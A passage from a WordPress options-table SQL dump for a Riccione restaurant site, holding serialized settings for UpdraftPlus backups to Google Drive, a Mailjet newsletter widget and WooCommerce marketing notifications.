";s:12:\"b87e989e4e00\";s:7:\"db-size\";s:7:\"1174269\";s:6:\"native\";b:0;}i:1608014760;a:6:{s:20:\"service_instance_ids\";a:1:{s:11:\"googledrive\";a:1:{i:0;s:34:\"s-119dd81f938eec2b733e558270c7c12d\";}}s:7:\"service\";a:1:{i:0;s:11:\"googledrive\";}s:2:\"db\";a:1:{i:0;s:62:\"backup_2020-12-15-0746_Ristorante_Sol_y_mar_4578cfed8378-db.gz\";}s:5:\"nonce\";s:12:\"4578cfed8378\";s:7:\"db-size\";s:6:\"247414\";s:6:\"native\";b:0;}i:1608012300;a:12:{s:20:\"service_instance_ids\";a:1:{s:11:\"googledrive\";a:1:{i:0;s:34:\"s-119dd81f938eec2b733e558270c7c12d\";}}s:7:\"service\";a:1:{i:0;s:11:\"googledrive\";}s:6:\"others\";a:1:{i:0;s:67:\"backup_2020-12-15-0705_Ristorante_Sol_y_mar_6d07354e9a08-others.zip\";}s:5:\"nonce\";s:12:\"6d07354e9a08\";s:11:\"others-size\";s:7:\"7537133\";s:6:\"native\";b:0;s:7:\"uploads\";a:1:{i:0;s:68:\"backup_2020-12-15-0705_Ristorante_Sol_y_mar_6d07354e9a08-uploads.zip\";}s:12:\"uploads-size\";s:3:\"340\";s:6:\"themes\";a:1:{i:0;s:67:\"backup_2020-12-15-0705_Ristorante_Sol_y_mar_6d07354e9a08-themes.zip\";}s:11:\"themes-size\";s:7:\"2256237\";s:7:\"plugins\";a:1:{i:0;s:68:\"backup_2020-12-15-0705_Ristorante_Sol_y_mar_6d07354e9a08-plugins.zip\";}s:12:\"plugins-size\";s:7:\"7180703\";}i:1608012120;a:6:{s:20:\"service_instance_ids\";a:1:{s:11:\"googledrive\";a:1:{i:0;s:34:\"s-119dd81f938eec2b733e558270c7c12d\";}}s:7:\"service\";a:1:{i:0;s:11:\"googledrive\";}s:2:\"db\";a:1:{i:0;s:62:\"backup_2020-12-15-0702_Ristorante_Sol_y_mar_c5a287536618-db.gz\";}s:5:\"nonce\";s:12:\"c5a287536618\";s:7:\"db-size\";s:6:\"236314\";s:6:\"native\";b:0;}i:1607931120;a:6:{s:20:\"service_instance_ids\";a:1:{s:11:\"googledrive\";a:1:{i:0;s:34:\"s-119dd81f938eec2b733e558270c7c12d\";}}s:7:\"service\";a:1:{i:0;s:11:\"googledrive\";}s:2:\"db\";a:1:{i:0;s:51:\"backup_2020-12-14-0832_Sol_Y_Mar_077655e3e26f-db.gz\";}s:5:\"nonce\";s:12:\"077655e3e26f\";s:7:\"db-size\";s:7:\"1209237\";s:6:\"native\";b:0;}i:1596961920;a:6:{s:20:\"service_instance_ids\";a:1:{s:11:\"googledrive\";a:1:{i:0;s:34:\"s-119dd81f938eec2b733e558270c7c12d\";}}s:7:\"service\";a:1:{i:0;s:11:\"googledrive\";}s:2:\"db\";a:1:{i:0;s:73:\"backup_2020-08-09-0932_Sol_Y_Mar_ristorante_a_Riccione_621cfd896661-db.gz\";}s:5:\"nonce\";s:12:\"621cfd896661\";s:7:\"db-size\";s:6:\"701395\";s:6:\"native\";b:0;}i:1592372640;a:14:{s:20:\"service_instance_ids\";a:1:{s:11:\"googledrive\";a:1:{i:0;s:34:\"s-119dd81f938eec2b733e558270c7c12d\";}}s:7:\"service\";a:1:{i:0;s:11:\"googledrive\";}s:2:\"db\";a:1:{i:0;s:62:\"backup_2020-06-17-0744_Ristorante_Sol_y_mar_3b65899b33f8-db.gz\";}s:5:\"nonce\";s:12:\"3b65899b33f8\";s:7:\"db-size\";s:5:\"68302\";s:6:\"native\";b:0;s:6:\"others\";a:1:{i:0;s:67:\"backup_2020-06-17-0744_Ristorante_Sol_y_mar_3b65899b33f8-others.zip\";}s:11:\"others-size\";s:6:\"846527\";s:7:\"uploads\";a:1:{i:0;s:68:\"backup_2020-06-17-0744_Ristorante_Sol_y_mar_3b65899b33f8-uploads.zip\";}s:12:\"uploads-size\";s:3:\"232\";s:6:\"themes\";a:1:{i:0;s:67:\"backup_2020-06-17-0744_Ristorante_Sol_y_mar_3b65899b33f8-themes.zip\";}s:11:\"themes-size\";s:7:\"2256237\";s:7:\"plugins\";a:1:{i:0;s:68:\"backup_2020-06-17-0744_Ristorante_Sol_y_mar_3b65899b33f8-plugins.zip\";}s:12:\"plugins-size\";s:7:\"7180703\";}}','no'),(294153,'updraft_remotesites','','yes'),(294154,'updraft_migrator_localkeys','','yes'),(294155,'updraft_central_localkeys','','yes'),(183680,'sbi_refresh_report','a:1:{s:5:\"notes\";a:1:{s:8:\"time_ran\";s:19:\"2021-04-20 01:17:10\";}}','no'),(183681,'woocommerce_admin_last_orders_milestone','250','yes'),(183698,'_transient_health-check-site-status-result','{\"good\":15,\"recommended\":5,\"critical\":0}','yes'),(183713,'updraftplus_unlocked_f','1','no'),(183714,'updraftplus_last_lock_time_f','2021-04-14 08:17:48','no'),(183715,'updraftplus_semaphore_f','0','no'),(183716,'updraft_last_scheduled_f','1618388268','yes'),(183745,'updraftplus_unlocked_d','1','no'),(183746,'updraftplus_last_lock_time_d','2021-04-19 08:37:56','no'),(183747,'updraftplus_semaphore_d','0','no'),(183748,'updraft_last_scheduled_d','1618821476','yes'),(183754,'updraft_last_backup','a:6:{s:11:\"backup_time\";i:1618821475;s:12:\"backup_array\";a:3:{s:2:\"db\";s:51:\"backup_2021-04-19-1037_Sol_Y_Mar_2836b61f0118-db.gz\";s:7:\"db-size\";i:1372279;s:9:\"checksums\";a:2:{s:4:\"sha1\";a:1:{s:3:\"db0\";s:40:\"c03f7e41c7dd5cb2961c2f36fed6f463affedfab\";}s:6:\"sha256\";a:1:{s:3:\"db0\";s:64:\"f447ab636e1d1163ba8c9be8183fe868734ca60c6fe9f6c1b51851094bec23f6\";}}}s:7:\"success\";i:1;s:6:\"errors\";a:0:{}s:12:\"backup_nonce\";s:12:\"2836b61f0118\";s:26:\"nonincremental_backup_time\";i:1618821475;}','yes'),(183989,'updraftplus_tour_cancelled_on','intro','yes'),(183997,'mailjet_widget_options','a:10:{s:5:\"en_US\";a:51:{s:17:\"language_checkbox\";b:0;s:5:\"title\";s:0:\"\";s:4:\"list\";s:1:\"0\";s:24:\"language_mandatory_email\";s:0:\"\";s:25:\"language_mandatory_button\";s:0:\"\";s:32:\"confirmation_email_message_input\";s:0:\"\";s:36:\"subscription_confirmed_message_input\";s:0:\"\";s:25:\"empty_email_message_input\";s:0:\"\";s:32:\"already_subscribed_message_input\";s:0:\"\";s:33:\"invalid_data_format_message_input\";s:0:\"\";s:37:\"generic_technical_error_message_input\";s:0:\"\";s:13:\"email_subject\";s:0:\"\";s:19:\"email_content_title\";s:0:\"\";s:23:\"email_content_main_text\";s:0:\"\";s:28:\"email_content_confirm_button\";s:0:\"\";s:26:\"email_content_after_button\";s:0:\"\";s:18:\"contactProperties0\";s:0:\"\";s:17:\"propertyDataType0\";s:1:\"0\";s:13:\"EnglishLabel0\";s:0:\"\";s:12:\"FrenchLabel0\";s:0:\"\";s:12:\"GermanLabel0\";s:0:\"\";s:13:\"SpanishLabel0\";s:0:\"\";s:13:\"ItalianLabel0\";s:0:\"\";s:18:\"contactProperties1\";s:0:\"\";s:17:\"propertyDataType1\";s:1:\"0\";s:13:\"EnglishLabel1\";s:0:\"\";s:12:\"FrenchLabel1\";s:0:\"\";s:12:\"GermanLabel1\";s:0:\"\";s:13:\"SpanishLabel1\";s:0:\"\";s:13:\"ItalianLabel1\";s:0:\"\";s:18:\"contactProperties2\";s:0:\"\";s:17:\"propertyDataType2\";s:1:\"0\";s:13:\"EnglishLabel2\";s:0:\"\";s:12:\"FrenchLabel2\";s:0:\"\";s:12:\"GermanLabel2\";s:0:\"\";s:13:\"SpanishLabel2\";s:0:\"\";s:13:\"ItalianLabel2\";s:0:\"\";s:18:\"contactProperties3\";s:0:\"\";s:17:\"propertyDataType3\";s:1:\"0\";s:13:\"EnglishLabel3\";s:0:\"\";s:12:\"FrenchLabel3\";s:0:\"\";s:12:\"GermanLabel3\";s:0:\"\";s:13:\"SpanishLabel3\";s:0:\"\";s:13:\"ItalianLabel3\";s:0:\"\";s:18:\"contactProperties4\";s:0:\"\";s:17:\"propertyDataType4\";s:1:\"0\";s:13:\"EnglishLabel4\";s:0:\"\";s:12:\"FrenchLabel4\";s:0:\"\";s:12:\"GermanLabel4\";s:0:\"\";s:13:\"SpanishLabel4\";s:0:\"\";s:13:\"ItalianLabel4\";s:0:\"\";}s:7:\"English\";a:1:{s:9:\"thank_you\";i:0;}s:5:\"fr_FR\";a:51:{s:17:\"language_checkbox\";b:0;s:5:\"title\";s:0:\"\";s:4:\"list\";s:1:\"0\";s:24:\"language_mandatory_email\";s:0:\"\";s:25:\"language_mandatory_button\";s:0:\"\";s:32:\"confirmation_email_message_input\";s:0:\"\";s:36:\"subscription_confirmed_message_input\";s:0:\"\";s:25:\"empty_email_message_input\";s:0:\"\";s:32:\"already_subscribed_message_input\";s:0:\"\";s:33:\"invalid_data_format_message_input\";s:0:\"\";s:37:\"generic_technical_error_message_input\";s:0:\"\";s:13:\"email_subject\";s:0:\"\";s:19:\"email_content_title\";s:0:\"\";s:23:\"email_content_main_text\";s:0:\"\";s:28:\"email_content_confirm_button\";s:0:\"\";s:26:\"email_content_after_button\";s:0:\"\";s:18:\"contactProperties0\";s:0:\"\";s:17:\"propertyDataType0\";s:1:\"0\";s:13:\"EnglishLabel0\";s:0:\"\";s:12:\"FrenchLabel0\";s:0:\"\";s:12:\"GermanLabel0\";s:0:\"\";s:13:\"SpanishLabel0\";s:0:\"\";s:13:\"ItalianLabel0\";s:0:\"\";s:18:\"contactProperties1\";s:0:\"\";s:17:\"propertyDataType1\";s:1:\"0\";s:13:\"EnglishLabel1\";s:0:\"\";s:12:\"FrenchLabel1\";s:0:\"\";s:12:\"GermanLabel1\";s:0:\"\";s:13:\"SpanishLabel1\";s:0:\"\";s:13:\"ItalianLabel1\";s:0:\"\";s:18:\"contactProperties2\";s:0:\"\";s:17:\"propertyDataType2\";s:1:\"0\";s:13:\"EnglishLabel2\";s:0:\"\";s:12:\"FrenchLabel2\";s:0:\"\";s:12:\"GermanLabel2\";s:0:\"\";s:13:\"SpanishLabel2\";s:0:\"\";s:13:\"ItalianLabel2\";s:0:\"\";s:18:\"contactProperties3\";s:0:\"\";s:17:\"propertyDataType3\";s:1:\"0\";s:13:\"EnglishLabel3\";s:0:\"\";s:12:\"FrenchLabel3\";s:0:\"\";s:12:\"GermanLabel3\";s:0:\"\";s:13:\"SpanishLabel3\";s:0:\"\";s:13:\"ItalianLabel3\";s:0:\"\";s:18:\"contactProperties4\";s:0:\"\";s:17:\"propertyDataType4\";s:1:\"0\";s:13:\"EnglishLabel4\";s:0:\"\";s:12:\"FrenchLabel4\";s:0:\"\";s:12:\"GermanLabel4\";s:0:\"\";s:13:\"SpanishLabel4\";s:0:\"\";s:13:\"ItalianLabel4\";s:0:\"\";}s:6:\"French\";a:1:{s:9:\"thank_you\";i:0;}s:5:\"de_DE\";a:51:{s:17:\"language_checkbox\";b:0;s:5:\"title\";s:0:\"\";s:4:\"list\";s:1:\"0\";s:24:\"language_mandatory_email\";s:0:\"\";s:25:\"language_mandatory_button\";s:0:\"\";s:32:\"confirmation_email_message_input\";s:0:\"\";s:36:\"subscription_confirmed_message_input\";s:0:\"\";s:25:\"empty_email_message_input\";s:0:\"\";s:32:\"already_subscribed_message_input\";s:0:\"\";s:33:\"invalid_data_format_message_input\";s:0:\"\";s:37:\"generic_technical_error_message_input\";s:0:\"\";s:13:\"email_subject\";s:0:\"\";s:19:\"email_content_title\";s:0:\"\";s:23:\"email_content_main_text\";s:0:\"\";s:28:\"email_content_confirm_button\";s:0:\"\";s:26:\"email_content_after_button\";s:0:\"\";s:18:\"contactProperties0\";s:0:\"\";s:17:\"propertyDataType0\";s:1:\"0\";s:13:\"EnglishLabel0\";s:0:\"\";s:12:\"FrenchLabel0\";s:0:\"\";s:12:\"GermanLabel0\";s:0:\"\";s:13:\"SpanishLabel0\";s:0:\"\";s:13:\"ItalianLabel0\";s:0:\"\";s:18:\"contactProperties1\";s:0:\"\";s:17:\"propertyDataType1\";s:1:\"0\";s:13:\"EnglishLabel1\";s:0:\"\";s:12:\"FrenchLabel1\";s:0:\"\";s:12:\"GermanLabel1\";s:0:\"\";s:13:\"SpanishLabel1\";s:0:\"\";s:13:\"ItalianLabel1\";s:0:\"\";s:18:\"contactProperties2\";s:0:\"\";s:17:\"propertyDataType2\";s:1:\"0\";s:13:\"EnglishLabel2\";s:0:\"\";s:12:\"FrenchLabel2\";s:0:\"\";s:12:\"GermanLabel2\";s:0:\"\";s:13:\"SpanishLabel2\";s:0:\"\";s:13:\"ItalianLabel2\";s:0:\"\";s:18:\"contactProperties3\";s:0:\"\";s:17:\"propertyDataType3\";s:1:\"0\";s:13:\"EnglishLabel3\";s:0:\"\";s:12:\"FrenchLabel3\";s:0:\"\";s:12:\"GermanLabel3\";s:0:\"\";s:13:\"SpanishLabel3\";s:0:\"\";s:13:\"ItalianLabel3\";s:0:\"\";s:18:\"contactProperties4\";s:0:\"\";s:17:\"propertyDataType4\";s:1:\"0\";s:13:\"EnglishLabel4\";s:0:\"\";s:12:\"FrenchLabel4\";s:0:\"\";s:12:\"GermanLabel4\";s:0:\"\";s:13:\"SpanishLabel4\";s:0:\"\";s:13:\"ItalianLabel4\";s:0:\"\";}s:6:\"German\";a:1:{s:9:\"thank_you\";i:0;}s:5:\"es_ES\";a:51:{s:17:\"language_checkbox\";b:0;s:5:\"title\";s:0:\"\";s:4:\"list\";s:1:\"0\";s:24:\"language_mandatory_email\";s:0:\"\";s:25:\"language_mandatory_button\";s:0:\"\";s:32:\"confirmation_email_message_input\";s:0:\"\";s:36:\"subscription_confirmed_message_input\";s:0:\"\";s:25:\"empty_email_message_input\";s:0:\"\";s:32:\"already_subscribed_message_input\";s:0:\"\";s:33:\"invalid_data_format_message_input\";s:0:\"\";s:37:\"generic_technical_error_message_input\";s:0:\"\";s:13:\"email_subject\";s:0:\"\";s:19:\"email_content_title\";s:0:\"\";s:23:\"email_content_main_text\";s:0:\"\";s:28:\"email_content_confirm_button\";s:0:\"\";s:26:\"email_content_after_button\";s:0:\"\";s:18:\"contactProperties0\";s:0:\"\";s:17:\"propertyDataType0\";s:1:\"0\";s:13:\"EnglishLabel0\";s:0:\"\";s:12:\"FrenchLabel0\";s:0:\"\";s:12:\"GermanLabel0\";s:0:\"\";s:13:\"SpanishLabel0\";s:0:\"\";s:13:\"ItalianLabel0\";s:0:\"\";s:18:\"contactProperties1\";s:0:\"\";s:17:\"propertyDataType1\";s:1:\"0\";s:13:\"EnglishLabel1\";s:0:\"\";s:12:\"FrenchLabel1\";s:0:\"\";s:12:\"GermanLabel1\";s:0:\"\";s:13:\"SpanishLabel1\";s:0:\"\";s:13:\"ItalianLabel1\";s:0:\"\";s:18:\"contactProperties2\";s:0:\"\";s:17:\"propertyDataType2\";s:1:\"0\";s:13:\"EnglishLabel2\";s:0:\"\";s:12:\"FrenchLabel2\";s:0:\"\";s:12:\"GermanLabel2\";s:0:\"\";s:13:\"SpanishLabel2\";s:0:\"\";s:13:\"ItalianLabel2\";s:0:\"\";s:18:\"contactProperties3\";s:0:\"\";s:17:\"propertyDataType3\";s:1:\"0\";s:13:\"EnglishLabel3\";s:0:\"\";s:12:\"FrenchLabel3\";s:0:\"\";s:12:\"GermanLabel3\";s:0:\"\";s:13:\"SpanishLabel3\";s:0:\"\";s:13:\"ItalianLabel3\";s:0:\"\";s:18:\"contactProperties4\";s:0:\"\";s:17:\"propertyDataType4\";s:1:\"0\";s:13:\"EnglishLabel4\";s:0:\"\";s:12:\"FrenchLabel4\";s:0:\"\";s:12:\"GermanLabel4\";s:0:\"\";s:13:\"SpanishLabel4\";s:0:\"\";s:13:\"ItalianLabel4\";s:0:\"\";}s:7:\"Spanish\";a:1:{s:9:\"thank_you\";i:0;}s:5:\"it_IT\";a:51:{s:17:\"language_checkbox\";i:1;s:5:\"title\";s:25:\"Iscriviti alla newsletter\";s:4:\"list\";s:5:\"22514\";s:24:\"language_mandatory_email\";s:0:\"\";s:25:\"language_mandatory_button\";s:0:\"\";s:32:\"confirmation_email_message_input\";s:0:\"\";s:36:\"subscription_confirmed_message_input\";s:0:\"\";s:25:\"empty_email_message_input\";s:0:\"\";s:32:\"already_subscribed_message_input\";s:0:\"\";s:33:\"invalid_data_format_message_input\";s:0:\"\";s:37:\"generic_technical_error_message_input\";s:0:\"\";s:13:\"email_subject\";s:0:\"\";s:19:\"email_content_title\";s:0:\"\";s:23:\"email_content_main_text\";s:0:\"\";s:28:\"email_content_confirm_button\";s:0:\"\";s:26:\"email_content_after_button\";s:0:\"\";s:18:\"contactProperties0\";s:0:\"\";s:17:\"propertyDataType0\";s:1:\"0\";s:13:\"EnglishLabel0\";s:0:\"\";s:12:\"FrenchLabel0\";s:0:\"\";s:12:\"GermanLabel0\";s:0:\"\";s:13:\"SpanishLabel0\";s:0:\"\";s:13:\"ItalianLabel0\";s:0:\"\";s:18:\"contactProperties1\";s:0:\"\";s:17:\"propertyDataType1\";s:1:\"0\";s:13:\"EnglishLabel1\";s:0:\"\";s:12:\"FrenchLabel1\";s:0:\"\";s:12:\"GermanLabel1\";s:0:\"\";s:13:\"SpanishLabel1\";s:0:\"\";s:13:\"ItalianLabel1\";s:0:\"\";s:18:\"contactProperties2\";s:0:\"\";s:17:\"propertyDataType2\";s:1:\"0\";s:13:\"EnglishLabel2\";s:0:\"\";s:12:\"FrenchLabel2\";s:0:\"\";s:12:\"GermanLabel2\";s:0:\"\";s:13:\"SpanishLabel2\";s:0:\"\";s:13:\"ItalianLabel2\";s:0:\"\";s:18:\"contactProperties3\";s:0:\"\";s:17:\"propertyDataType3\";s:1:\"0\";s:13:\"EnglishLabel3\";s:0:\"\";s:12:\"FrenchLabel3\";s:0:\"\";s:12:\"GermanLabel3\";s:0:\"\";s:13:\"SpanishLabel3\";s:0:\"\";s:13:\"ItalianLabel3\";s:0:\"\";s:18:\"contactProperties4\";s:0:\"\";s:17:\"propertyDataType4\";s:1:\"0\";s:13:\"EnglishLabel4\";s:0:\"\";s:12:\"FrenchLabel4\";s:0:\"\";s:12:\"GermanLabel4\";s:0:\"\";s:13:\"SpanishLabel4\";s:0:\"\";s:13:\"ItalianLabel4\";s:0:\"\";}s:7:\"Italian\";a:1:{s:9:\"thank_you\";i:0;}}','yes'),(184062,'mailjet_woo_edata_sync','','yes'),(184063,'mailjet_woo_checkout_checkbox','','yes'),(184064,'mailjet_woo_banner_checkbox','','yes'),(184409,'crypto_hash','fdf1a3e7d52fc5419265','yes'),(195605,'woocommerce_schema_version','430','yes'),(195629,'wc_blocks_db_schema_version','260','yes'),(210922,'woocommerce_sales_record_date','2020-12-24','yes'),(210923,'woocommerce_sales_record_amount','500','yes'),(213001,'yith_woocompare_button_text','<svg xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 512 512\"><path d=\"M504.971 359.029c9.373 9.373 9.373 24.569 0 33.941l-80 79.984c-15.01 15.01-40.971 4.49-40.971-16.971V416h-58.785a12.004 12.004 0 0 1-8.773-3.812l-70.556-75.596 53.333-57.143L352 336h32v-39.981c0-21.438 25.943-31.998 40.971-16.971l80 79.981zM12 176h84l52.781 56.551 53.333-57.143-70.556-75.596A11.999 11.999 0 0 0 122.785 96H12c-6.627 0-12 5.373-12 12v56c0 6.627 5.373 12 12 12zm372 0v39.984c0 21.46 25.961 31.98 40.971 16.971l80-79.984c9.373-9.373 9.373-24.569 0-33.941l-80-79.981C409.943 24.021 384 34.582 384 56.019V96h-58.785a12.004 12.004 0 0 0-8.773 3.812L96 336H12c-6.627 0-12 5.373-12 12v56c0 6.627 5.373 12 12 12h110.785c3.326 0 6.503-1.381 8.773-3.812L352 176h32z\" /></svg>','yes'),(217831,'disallowed_keys','','no'),(217832,'comment_previously_approved','1','yes'),(217833,'auto_plugin_theme_update_emails','a:0:{}','no'),(217834,'finished_updating_comment_type','1','yes'),(255020,'wc_admin_note_home_screen_feedback_homescreen_accessed','1602720089','yes'),(255035,'wc_remote_inbox_notifications_stored_state','O:8:\"stdClass\":2:{s:22:\"there_were_no_products\";b:0;s:22:\"there_are_now_products\";b:1;}','yes'),(255224,'wc_remote_inbox_notifications_specs','a:16:{s:20:\"paypal_ppcp_gtm_2021\";O:8:\"stdClass\":8:{s:4:\"slug\";s:20:\"paypal_ppcp_gtm_2021\";s:4:\"type\";s:9:\"marketing\";s:6:\"status\";s:10:\"unactioned\";s:12:\"is_snoozable\";i:0;s:6:\"source\";s:15:\"woocommerce.com\";s:7:\"locales\";a:1:{i:0;O:8:\"stdClass\":3:{s:6:\"locale\";s:5:\"en_US\";s:5:\"title\";s:38:\"Offer more options with the new PayPal\";s:7:\"content\";s:113:\"Get the latest PayPal extension for a full suite of payment methods with extensive currency and country coverage.\";}}s:7:\"actions\";a:1:{i:0;O:8:\"stdClass\":6:{s:4:\"name\";s:36:\"open_wc_paypal_payments_product_page\";s:7:\"locales\";a:1:{i:0;O:8:\"stdClass\":2:{s:6:\"locale\";s:5:\"en_US\";s:5:\"label\";s:10:\"Learn more\";}}s:3:\"url\";s:61:\"https://woocommerce.com/products/woocommerce-paypal-payments/\";s:18:\"url_is_admin_query\";b:0;s:10:\"is_primary\";b:1;s:6:\"status\";s:8:\"actioned\";}}s:5:\"rules\";a:4:{i:0;O:8:\"stdClass\":2:{s:4:\"type\";s:18:\"publish_after_time\";s:13:\"publish_after\";s:19:\"2021-04-05 00:00:00\";}i:1;O:8:\"stdClass\":2:{s:4:\"type\";s:19:\"publish_before_time\";s:14:\"publish_before\";s:19:\"2021-04-21 00:00:00\";}i:2;O:8:\"stdClass\":2:{s:4:\"type\";s:2:\"or\";s:8:\"operands\";a:7:{i:0;O:8:\"stdClass\":2:{s:4:\"type\";s:17:\"plugins_activated\";s:7:\"plugins\";a:1:{i:0;s:43:\"woocommerce-gateway-paypal-express-checkout\";}}i:1;O:8:\"stdClass\":2:{s:4:\"type\";s:17:\"plugins_activated\";s:7:\"plugins\";a:1:{i:0;s:30:\"woocommerce-gateway-paypal-pro\";}}i:2;O:8:\"stdClass\":2:{s:4:\"type\";s:17:\"plugins_activated\";s:7:\"plugins\";a:1:{i:0;s:37:\"woocommerce-gateway-paypal-pro-hosted\";}}i:3;O:8:\"stdClass\":2:{s:4:\"type\";s:17:\"plugins_activated\";s:7:\"plugins\";a:1:{i:0;s:35:\"woocommerce-gateway-paypal-advanced\";}}i:4;O:8:\"stdClass\":2:{s:4:\"type\";s:17:\"plugins_activated\";s:7:\"plugins\";a:1:{i:0;s:40:\"woocommerce-gateway-paypal-digital-goods\";}}i:5;O:8:\"stdClass\":2:{s:4:\"type\";s:17:\"plugins_activated\";s:7:\"plugins\";a:1:{i:0;s:31:\"woocommerce-paypal-here-gateway\";}}i:6;O:8:\"stdClass\":2:{s:4:\"type\";s:17:\"plugins_activated\";s:7:\"plugins\";a:1:{i:0;s:44:\"woocommerce-gateway-paypal-adaptive-payments\";}}}}i:3;O:8:\"stdClass\":2:{s:4:\"type\";s:2:\"or\";s:8:\"operands\";a:2:{i:0;O:8:\"stdClass\":2:{s:4:\"type\";s:3:\"not\";s:7:\"operand\";a:1:{i:0;O:8:\"stdClass\":2:{s:4:\"type\";s:17:\"plugins_activated\";s:7:\"plugins\";a:1:{i:0;s:27:\"woocommerce-paypal-payments\";}}}}i:1;O:8:\"stdClass\":4:{s:4:\"type\";s:14:\"plugin_version\";s:6:\"plugin\";s:27:\"woocommerce-paypal-payments\";s:7:\"version\";s:5:\"1.2.1\";s:8:\"operator\";s:1:\"<\";}}}}}s:23:\"facebook_pixel_api_2021\";O:8:\"stdClass\":8:{s:4:\"slug\";s:23:\"facebook_pixel_api_2021\";s:4:\"type\";s:9:\"marketing\";s:6:\"status\";s:10:\"unactioned\";s:12:\"is_snoozable\";i:0;s:6:\"source\";s:15:\"woocommerce.com\";s:7:\"locales\";a:1:{i:0;O:8:\"stdClass\":3:{s:6:\"locale\";s:5:\"en_US\";s:5:\"title\";s:44:\"Improve the performance of your Facebook ads\";s:7:\"content\";s:168:\"Enable Facebook Pixel and Conversions API through the latest version of Facebook for WooCommerce for improved performance and measurement of your Facebook ad campaigns.\";}}s:7:\"actions\";a:1:{i:0;O:8:\"stdClass\":6:{s:4:\"name\";s:30:\"upgrade_now_facebook_pixel_api\";s:7:\"locales\";a:1:{i:0;O:8:\"stdClass\":2:{s:6:\"locale\";s:5:\"en_US\";s:5:\"label\";s:11:\"Upgrade now\";}}s:3:\"url\";s:67:\"plugin-install.php?tab=plugin-information&plugin=&section=changelog\";s:18:\"url_is_admin_query\";b:0;s:10:\"is_primary\";b:1;s:6:\"status\";s:8:\"actioned\";}}s:5:\"rules\";a:3:{i:0;O:8:\"stdClass\":2:{s:4:\"type\";s:18:\"publish_after_time\";s:13:\"publish_after\";s:19:\"2021-02-15 00:00:00\";}i:1;O:8:\"stdClass\":2:{s:4:\"type\";s:19:\"publish_before_time\";s:14:\"publish_before\";s:19:\"2021-02-29 00:00:00\";}i:2;O:8:\"stdClass\":4:{s:4:\"type\";s:14:\"plugin_version\";s:6:\"plugin\";s:24:\"facebook-for-woocommerce\";s:7:\"version\";s:5:\"2.1.4\";s:8:\"operator\";s:2:\"<=\";}}}s:16:\"facebook_ec_2021\";O:8:\"stdClass\":8:{s:4:\"slug\";s:16:\"facebook_ec_2021\";s:4:\"type\";s:9:\"marketing\";s:6:\"status\";s:10:\"unactioned\";s:12:\"is_snoozable\";i:0;s:6:\"source\";s:15:\"woocommerce.com\";s:7:\"locales\";a:1:{i:0;O:8:\"stdClass\":3:{s:6:\"locale\";s:5:\"en_US\";s:5:\"title\";s:59:\"Sync your product catalog with Facebook to help boost sales\";s:7:\"content\";s:170:\"A single click adds all products to your Facebook Business Page shop. Product changes are automatically synced, with the flexibility to control which products are listed.\";}}s:7:\"actions\";a:1:{i:0;O:8:\"stdClass\":6:{s:4:\"name\";s:22:\"learn_more_facebook_ec\";s:7:\"locales\";a:1:{i:0;O:8:\"stdClass\":2:{s:6:\"locale\";s:5:\"en_US\";s:5:\"label\";s:10:\"Learn more\";}}s:3:\"url\";s:42:\"https://woocommerce.com/products/facebook/\";s:18:\"url_is_admin_query\";b:0;s:10:\"is_primary\";b:1;s:6:\"status\";s:10:\"unactioned\";}}s:5:\"rules\";a:3:{i:0;O:8:\"stdClass\":2:{s:4:\"type\";s:18:\"publish_after_time\";s:13:\"publish_after\";s:19:\"2021-03-01 00:00:00\";}i:1;O:8:\"stdClass\":2:{s:4:\"type\";s:19:\"publish_before_time\";s:14:\"publish_before\";s:19:\"2021-03-15 00:00:00\";}i:2;O:8:\"stdClass\":2:{s:4:\"type\";s:17:\"plugins_activated\";s:7:\"plugins\";a:1:{i:0;s:24:\"facebook-for-woocommerce\";}}}}s:37:\"ecomm-need-help-setting-up-your-store\";O:8:\"stdClass\":8:{s:4:\"slug\";s:37:\"ecomm-need-help-setting-up-your-store\";s:4:\"type\";s:4:\"info\";s:6:\"status\";s:10:\"unactioned\";s:12:\"is_snoozable\";i:0;s:6:\"source\";s:15:\"woocommerce.com\";s:7:\"locales\";a:1:{i:0;O:8:\"stdClass\":3:{s:6:\"locale\";s:5:\"en_US\";s:5:\"title\";s:32:\"Need help setting up your Store?\";s:7:\"content\";s:350:\"Schedule a free 30-min <a href=\"https://wordpress.com/support/concierge-support/\">quick start session</a> and get help from our specialists. We’re happy to walk through setup steps, show you around the WordPress.com dashboard, troubleshoot any issues you may have, and help you the find the features you need to accomplish your goals for your site.\";}}s:7:\"actions\";a:1:{i:0;O:8:\"stdClass\":6:{s:4:\"name\";s:16:\"set-up-concierge\";s:7:\"locales\";a:1:{i:0;O:8:\"stdClass\":2:{s:6:\"locale\";s:5:\"en_US\";s:5:\"label\";s:21:\"Schedule free session\";}}s:3:\"url\";s:34:\"https://wordpress.com/me/concierge\";s:18:\"url_is_admin_query\";b:0;s:10:\"is_primary\";b:1;s:6:\"status\";s:8:\"actioned\";}}s:5:\"rules\";a:1:{i:0;O:8:\"stdClass\":2:{s:4:\"type\";s:17:\"plugins_activated\";s:7:\"plugins\";a:3:{i:0;s:35:\"woocommerce-shipping-australia-post\";i:1;s:32:\"woocommerce-shipping-canada-post\";i:2;s:30:\"woocommerce-shipping-royalmail\";}}}}s:20:\"woocommerce-services\";O:8:\"stdClass\":8:{s:4:\"slug\";s:20:\"woocommerce-services\";s:4:\"type\";s:4:\"info\";s:6:\"status\";s:10:\"unactioned\";s:12:\"is_snoozable\";i:0;s:6:\"source\";s:15:\"woocommerce.com\";s:7:\"locales\";a:1:{i:0;O:8:\"stdClass\":3:{s:6:\"locale\";s:5:\"en_US\";s:5:\"title\";s:26:\"WooCommerce Shipping & Tax\";s:7:\"content\";s:255:\"WooCommerce Shipping & Tax helps get your store “ready to sell” as quickly as possible. You create your products. We take care of tax calculation, payment processing, and shipping label printing! Learn more about the extension that you just installed.\";}}s:7:\"actions\";a:1:{i:0;O:8:\"stdClass\":6:{s:4:\"name\";s:10:\"learn-more\";s:7:\"locales\";a:1:{i:0;O:8:\"stdClass\":2:{s:6:\"locale\";s:5:\"en_US\";s:5:\"label\";s:10:\"Learn 